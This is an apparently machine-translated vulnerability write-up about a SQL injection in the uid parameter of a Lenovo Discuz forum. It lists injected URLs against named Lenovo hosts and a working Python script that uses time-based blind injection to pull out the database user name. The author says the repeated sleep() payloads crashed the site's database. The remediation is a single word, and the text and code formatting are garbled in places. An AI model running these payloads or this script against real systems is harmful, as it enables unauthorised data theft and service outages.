Lenovo's Discuz Forum MySQL injection script

Lenovo's Discuz Forum MySQL injection script

MySQL injection at a Discuz forum in Lenovo, tested several times
Script for guessing

Suspected Discuz injection introduced by Lenovo's secondary development. ThinkPad Forum

Http://lenovobbs.lcf5.lenovo.com.cn/forum.php? Mod = person_thread & uid = aa

The uid parameter can be injected.
 

When you access the preceding address, an error is returned:

Discuz! Database Error(1054) Unknown column 'aa' in 'where clause'select * from forum_thread where authorid in(aa)

We can see that aa is in brackets.

Access:

Http://thinkbbs.lenovo.com.cn/forum.php? Mod = person_thread & uid = 100) or (sleep (1)

The page is loading... It indicates that sleep is available.



However, some SQL keywords are filtered again, such as select. Therefore, the use of error injection is limited:

Http://lenovobbs.lcf5.lenovo.com.cn/forum.php? Mod = person_thread & uid = select (100)
 

Guess the length of user:

Http://thinkbbs.lenovo.com.cn/forum.php? Mod = person_thread & uid = length (user ())

, Is 29:
 

The following figure shows the first few characters of a MySQL user:

Bbs_u @ len



However, when I repeated the guesses, I found that the entire website on the page was suspended, including the homepage...

Discuz! Database Error(1203) notconnect

This means that the database crashes because there are too many sleep instances.


 

In fact, I don't need to use the sleep function. I can directly view user_id on the page to complete the guess... I just like blind injection too much and insist on injecting an ascii code as a blind injection ..
 

import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {    'Cookie': '',    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10):    payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' ']print 'start to retrive MySQL user:'user = ''for i in range(1,30,1):    for payload in payloads:        try:            conn = httplib.HTTPConnection('thinkbbs.lenovo.com.cn', timeout=10)            rand_num = str(random.random())            url = "/forum.php?mod=person_thread&uid=" + urllib.quote("sleep(ascii(mid(user()from(%s)for(1)))=%s)" % (i, ord(payload)) )            conn.request(method='GET', url=url,                         headers = headers)            start_time = time.time()            html_doc = conn.getresponse().read()            conn.close()            print '.',        except:            user += payload            print '\n[in progress]', user            breakprint '\nMySQL user is', user

 

Solution:

Filter